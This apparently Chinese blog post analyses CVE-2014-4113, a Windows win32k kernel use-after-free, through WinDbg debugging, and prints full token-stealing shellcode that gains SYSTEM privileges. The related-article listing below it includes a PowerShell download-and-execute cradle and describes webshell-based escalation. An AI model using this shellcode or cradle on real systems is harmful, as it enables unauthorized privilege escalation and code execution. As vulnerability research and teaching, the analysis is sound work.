CVE-2014-4113

最新推荐文章于 2023-04-21 10:00:00 发布
最新推荐文章于 2023-04-21 10:00:00 发布
阅读量1.2k 收藏 4
点赞数 3
分类专栏: CVE 文章标签: CVE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CharlesGodX/article/details/87856741
版权

0x00:前言

这次是一个经典的内核提权漏洞,问题出在win32k.sys中,据说已经可以用在Windows 8.1上了,因为直接拿到了exp,所以我们直接从exp入手分析,实验环境的一些文件:https://github.com/ThunderJie/CVE/tree/master/CVE-2014-4113

0x01:实验环境

  • Windows 7 x86(虚拟机)
  • Windbg 10.0.17134.1 + virtualKD(双机调试)
  • VS 2015 (编译release版本)
  • IDA Pro(反编译)
  • exp.exe

0x02:漏洞原理

这个漏洞的主要原理是:销毁弹出菜单的时候通过钩子的方法修改返回值,将返回值修改为fffffffb,因为对这个值没有严格的检查从而在sendmessage中再次被引用到,从而造成了UAF,这个方法可以在sendmessage中跳转到shellcode从而提权

知识点

UAF,WinDbg使用等

0x03:漏洞分析

1.分析源码

首先拿到exp的源码我们分析以下它做了哪些事情,首先加载解析了一些符号,创建了两个菜单,我们直接看到关键部分TrackPopupMenu()这个函数,这里是主要的攻击部分,我们现在就需要动态调试定位到这里,查看exp到底做了什么事情

2.动态调试

知道了关键的函数,我们就可以直接进行双机调试了,双机调试中环境的搭建我在CVE-2014-1767说过,就不在赘述,我们首先x查找符号TrackPopupMenu()的二进制地址
在这里插入图片描述

ba对内存访问设置断点
在这里插入图片描述

运行exp断在了这里
在这里插入图片描述

我们通过!process 0 0找到exp的进程地址
在这里插入图片描述

然后dt _EPROCESS 871daca8查看该进程的结构体信息,我们找到token的位置,发现是在0xf8偏移处
在这里插入图片描述
我们通过dd查看当前进程的token
在这里插入图片描述

我们在找到system的EPROCESS结构
在这里插入图片描述

查看system的token位置
在这里插入图片描述
找到system中token的值
在这里插入图片描述

我们的shellcode的作用就是负责将进程中的token替换为system中的token达到提权的目的,我们在当前进程的token位置处下一个写入断点,当该地址被写入的时候也就是shell code执行的时候,我们就会断下,这里我们设置条件断点并且打印一下token的值以便观察:

ba w1 871dada0 “.printf “Token:0x%08x\n”,poi(871dada0);.if(poi(871dada0)=0x890012cf){;}.else{g;}”

继续运行可以看到token的改变,断在了这里
在这里插入图片描述

从汇编窗口可以看到这个函数并没有执行完,我们执行几步将这个函数执行完再观察
在这里插入图片描述

我们再次查看进程中token的值发现已经和上面system的token一样,也就是替换成功了,接下来也就是shellcode的内容了
在这里插入图片描述
在执行shellcode之前我们栈回溯一下查看调用顺序
在这里插入图片描述
可以看到,我们最后调用了win32k!xxxSendMessageTimeout函数,我们用IDA分析win32k.sys找到以94f3结尾的地址(存在ASLR):
在这里插入图片描述
我们F5反汇编查看上面调用的[esi+60h]函数信息这里调用了一个P参数
在这里插入图片描述
我们查看到函数的第一个调用参数为P
在这里插入图片描述
我们回到windbg中,查看到第一个参数为fffffffb,也就是-5
在这里插入图片描述
我们转到源码发现这里有个HookCallbacktwo的回调函数,内容是先调用了EndMenu函数释放一个菜单,之后返回一个-5的值,而这个回调函数则刚好是我们钩子设定的函数
在这里插入图片描述
我们查看这个返回值加上60会跳转到哪里
在这里插入图片描述

我们发现会直接跳转到shellcode部分,接下来就开始执行我们的Shellcode
在这里插入图片描述

0x04:漏洞利用

shellcode部分主要就是达到提权的效果

int __stdcall TokenStealingShellcodeWin7(int one, int two, int three, int four) {
	__asm {
		; initialize
			pushad; save registers state

			xor eax, eax; Set zero
			mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
			mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

			mov ecx, eax; Copy current _EPROCESS structure

			mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
			mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4

		SearchSystemPID:
		mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
			sub eax, FLINK_OFFSET
			cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
			jne SearchSystemPID

			mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
			mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM
			; to current process
			popad; restore registers state
	}
	return 0;
}

成功利用漏洞的效果如下:
在这里插入图片描述

0x05:总结

非常经典的一个内核提权漏洞,在分析的过程中遇到过很多问题,但是最后都还是解决了,在源码中我并没有一句一句的分析,读者有兴趣可以自己去琢磨,毕竟注释写的还是很清楚的
参考资料:
https://www.ichunqiu.com/course/56147

Thunder_J
关注
专栏目录
windows 提权 CVE-2016-3225 CVE-2014-4113 CVE-2020-0787
qq_44905657的博客
01-07 3709
windows提权 1、搭建环境 我们先使用一个windows server 2012 R2,搭建IIS,弄一个建议网站,传个123.aspx大马 该大马可以执行文件、命令以及上传等操作,但是他有些目录是无法操作的,我们再上传一个6.asp扫描当前指定路径的可操作路径。 其中红色表示文件可替换,蓝色表示目录可写,我们选择一个C:\windows\Temp路径操作 2、各种提权 我们先使用windows server 2012比较常见的几种提权方式,CVE-2016-3225 (MS16-075) 当攻
CVE-2014-4113的POC
04-18
这是windows内核提权漏洞的一个POC,用来帮助分析理解漏洞原理。
CVE-2014-4113本地提权测试
weixin_30607659的博客
04-20 182
CVE-2014-4113本地提权漏洞分析 By Netfairy 前言 2014年10月14日, Crowdstrike和FireEye发表了一篇文章, 描述了一个新的针对Windows的提权漏洞. Crowdstrike的文章表明:这一新漏洞是在追踪一个高度先进攻击团队飓风熊猫(HURRICANE PANDA)发现的, 这之前, 飓风熊猫利用此漏洞进行攻击已至少五个月了.原文http:/...
注册表检测 ms14-058 CVE-2014-4113
weixin_33836223的博客
12-24 125
#检测ms14-058CVE-2014-4113HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix\KB3000061\Installed 转载于:https://www.cnblogs.com/dzxs/p/4183642.html
CVE-2014-4113 windows通杀本地提权0day
weixin_34092455的博客
10-19 271
这个0day的发现挺有意思的,是老外CrowdStrike 发现的,被老外监测程序发现显示从WEBSHELL使用Win64.exe来提升权限。 原文地址:http://blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane...
CVE-2014-4113 (MS14-058)提权
qq_42307546的博客
03-25 1312
2.CVE-2014-4113 (MS14-058)提权 1.漏洞描述 Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它 包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。如果Windows内核模式驱动程序不正确地处 理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代 码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。 2.影响版本 该漏洞影响所有Windows
MS14-058 CVE-2014-4113
10-21
【MS14-058 CVE-2014-4113】是一个重要的安全更新,主要针对Microsoft Office套件中的一个严重漏洞。这个漏洞编号为CVE-2014-4113,其影响了多个版本的Microsoft Office,包括Word、Excel和PowerPoint等应用程序。该...
CVE-2014-4113-exp.zip_CVE-2014-4113_cve_cve-2014-4113提权
09-24
CVE-2014-4113提权漏洞利用代码,国外大牛将最初只能在win7上使用的代码扩展到了win8上可用。python开发~
CVE-2014-4113:PowerShell CVE-2014-4113
07-12
CVE-2014-4113 PowerShell CVE-2014-4113 仅限 x64 Windows iex (New-Object Net.WebClient).DownloadString(' ')
CVE-2014-4113:飓风熊猫(HURRICANE PANDA)Win64bit提权0day漏洞
小驹的专栏
11-09 4309
飓风熊猫被认为是原产于中国、主要针对基础设施公司的先进攻击者。我们知道它们除了拥有0day漏洞外,还有其他的三种本地特权提升漏洞。我们知道飓风熊猫使用的是“ChinaChopper”Webshell,而一旦上传这一Webshell,操作者就可试图提升权限,然后通过各种密码破解工具获得目标访问的合法凭证。本地实验结果使用0sayTest.exe cmd命令后,打开的权限从原来的xiaoju变成了sy
CVE-2014-4113_Win32k提权漏洞学习笔记
HBohan的博客
03-17 970
一.前言 1.漏洞描述 该漏洞发生的位置是在驱动文件Win32k.sys中的xxxHandleMenuMessage函数,产生的原因是没有对该函数中调用的xxxMNFindWindowFromPoint函数的返回值进行合法性验证,直接将其作为参数传递给后面的xxxSendMessage函数调用,从而造成了提权漏洞。 2.实验环境 操作系统: Win7 x86 sp1 专业版 编译器: Visual Studio 2017 调试器: IDA Pro,WinDbg 二.漏洞分析 1.静态分析 通过IDA直接
Windows 8.1内核利用—CVE-2014-4113漏洞分析
SAKAISON的博客
09-01 2429
1.情况简介: 2014年10月14日,CrowdStrike和FireEye两家IT公司各自发布了一篇博文,在其中都不约而同地介绍了一个基于Windows系统的新型内核权限提升漏洞。CrowdStrike公司在文章中提到:他们是在追踪一个名叫Hurricane Panda(飓风熊猫)的黑客组织的过程中,发现并证实该漏洞的。该漏洞在Internet上至少已经活跃了5个月的时间
CVE-2014-4113:飓风熊猫(HURRICANE PANDA)Win64bit提起权0day破绽
aofan9566的博客
09-15 114
飓风熊猫被觉得是原产于中国、主要针对基础设施公司的先进攻击者。我们知道它们除了拥有0day漏洞外。还有其它的三种本地特权提升漏洞。我们知道飓风熊猫使用的是“ChinaChopper”Webshell,而一旦上传这一Webshell,操作者就可试图提升权限,然后通过各种password破解工具获得目标訪问的合法凭证。本地实验结果使用0sayTest.exe cmd命令后,打开的权限从原...
Windows内核提权漏洞CVE-2014-4113分析报告
weixin_34218890的博客
03-08 307
百度安全攻防实验室 · 2014/10/23 16:480x00 漏洞背景近日CrowdStrike团队发现Win64bit2008 R2服务器系统上存在可疑攻击行为,并捕获到相关样本。百度安全攻防实验室根据外界放出的poc进行了研究,漏洞成因和利用细节如下。 此类提权漏洞曾经出现在2011年的8个CVE中(CVE-2011-1878~CVE-2011-1885),由挪威安全公司Norman的内核...
CVE-2014-4113 Win8.1 64位利用(2014.11)
weixin_30621711的博客
05-02 92
CVE-2014-4113 Win8.1 64位利用 关于漏洞成因的分析已经很多了,但是样本针对的是win8之前的利用,国外研究员Moritz Jodeit对Win8.1上的利用做了研究,并给出了思路。根据其思路,对Win8.1利用做尝试。 Win8.1中调用xxxMNFindWindowFromPoint函数后,对得到的窗口对象tagWnd结构的处理代码存在差异: Win8.1从[ta...
漏洞分析丨cve20144113
m0_64973256的博客
04-21 422
Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。
Windows提权---系统漏洞提权
qq_40012781的博客
07-02 1341
思路:使用辅助工具检查出电脑上存在哪些漏洞,然后精准打击...
漏洞分析:MS14-058(CVE-2014-4113
m0_64973256的博客
10-20 600
作者:selph漏洞分析:CVE-2014-4113漏洞介绍漏洞程序Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后台控制窗口和屏幕输出管理等。如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;
CVE-2014-4113漏洞利用过程分析
weixin_33888907的博客
03-08 937
cssembly · 2014/10/24 14:130x00 简介通过VMware和Windbg搭建32位内核调试环境,系统为xp sp2,执行漏洞利用程序win32.exe calc.exe,弹出了一个SYSTEM权限的calc。通过IDA分析win32.exe,可以看到signed int __cdecl sub_4010F2()函数通过调用ZwQuerySystemInformation泄...
CVE-2014-3566
最新发布
07-28
回答: CVE-2014-3566是指POODLE攻击,它利用了SSLv3协议中的一个漏洞。攻击者可以通过重新发送密文来获取明文信息。具体来说,攻击者需要重新发送密文,直到服务器接受请求。根据CBC解密过程,攻击者可以通过密文的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值